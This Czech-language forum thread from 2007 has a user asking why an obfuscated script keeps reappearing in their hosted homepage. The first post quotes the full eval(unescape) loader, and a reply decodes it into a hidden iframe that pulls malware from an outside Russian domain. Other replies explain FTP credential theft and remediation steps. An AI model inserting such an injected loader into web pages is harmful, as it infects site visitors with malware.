Autor | Zpráva | ||
---|---|---|---|
jaseb Profil |
#1 · Zasláno: 11. 10. 2007, 17:07:00
Přes ftp natáhnu stránky na web (mám to hosting na forpsi) a funguje to v pohodě, ale když to kontroluju třeba za 2 hod, tak se ve zdrojáku na úvodní stránce objevý skript: <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%4 4%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69 %66%72%61%6d%65%20%6e%61%6d%65%3d%37%64%66%39%30%35%20%73%72%63%3d%5c% 27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2 e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72 %61%6e%64%6f%6d%28%29%2a%33%31%39%32%30%29%2b%27%38%62%34%5c%27%20%77% 69%64%74%68%3d%33%33%36%20%68%65%69%67%68%74%3d%39%35%20%73%74%79%6c%6 5%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66 %72%61%6d%65%3e%27%29")); </script>
a od tohoto okamžiku si to chce stáhnout něco z netu a ten soubor je zavirovanej. Když to smažu a uložim, tak to zas funguje v pohodě, ale za nějakej čas se to tam zase dostane. Netuší někdo co s tim dělat? |
||
Měsíček Profil |
#2 · Zasláno: 11. 10. 2007, 17:18:50
ne ani tak zavirovanej jak zašifrovanej funkcí " Escape()"
|
||
Joker Profil |
#3 · Zasláno: 11. 10. 2007, 17:25:56
No nejspíš to tam někdo cpe. Je potřeba zjistit, jakým způsobem se to tam dostane.
|
||
Chamurappi Profil |
#4 · Zasláno: 11. 10. 2007, 17:40:27
Reaguji na jaseba:
Máš vir, ten poslal tvé přihlašovací údaje k FTP zahraničnímu robotovi a ten každou hodinu upravuje kód všech tvých stránek, abys infekcí potěšil i své návštěvníky. |
||
Měsíček Profil |
#5 · Zasláno: 11. 10. 2007, 18:09:20
změň heslo a mělo by to býti v pohodě ;)
|
||
Bubák Profil |
#6 · Zasláno: 11. 10. 2007, 18:29:27
Zajímavý script:
"window.status='Done';document.write('<iframe name=7df905 src='http://alltraff.ru/lol.php?'+Math.round(Math.random()*31920)+'8b4 ' width=336 height=95 style='display: none'></iframe>')" |
||
peta Profil |
#7 · Zasláno: 12. 10. 2007, 19:51:02
jaseb
<script>eval(unescape(".......")); </script> v prvni rade jsi si mohl prozkoumat script, viz Bubák <script>alert(unescape(".......")); </script> Jako druhe bych sledoval odkud se to tam veme. Na to bych mel par tipu: viz Měsíček, zmenil bych si heslo na ftp, pro jistotu. Ale to zrejme na dlouho nepomuze, protoze to vypada, ze to mas zavirovane ty nebo pouzivas na FTP takovy program, ktery ti to tam dava. Protoze pouzivas neregistrovanou verzi, treba. Take to muze byt problem hostingu. Takze bych mozna zkusil jako treti odvirovat komp v nouzovem rezimu, jak na adware-spyware, tak mozna zkusit potom avg/nod32. Pokud to neudelas v nouzovem rezimu, tak jen ztracis cas. Mozna by bylo dobre jeste napsat, jaky editor a jaky FTP program s jakymi licencemi pouzivas. Dalo by se mozna dohledat na google podle 'http://alltraff.ru' je to souvisi prave s temito programy a dela to i jinym lidem. Google mi vyhodilo na tu web: alltraff.ru/spl/index.php Tyto stránky mohou poškodit váš počítač. Podobné stránky :) google.com: alltraff.ru javascript tady treba 1 forum o tom pojednava take: http://www.webhostingtalk.com/showthread.php?p=4731997 - doporucuji si prostudovat logy, kde bude napsano, ktery script-program to tam dal. A pokud to tam neni, pak je to problem na danem serveru. Dobre, ze jsi uvedl, ze se jedna o forpsi, mozna by to chtelo odkaz na stranku. - take tam napriklad pisi o moznych chybach v bezpecnosti, napr. v programech: phpbb, wordpress, etc... A zajimavy tip, ze bys mohl nastavit v danem adresari, souboru prava takova, aby jej neslo prepsat. Tedy, jestli umis nastavit linuxova prava. |
||
Časová prodleva: 17 let
|
0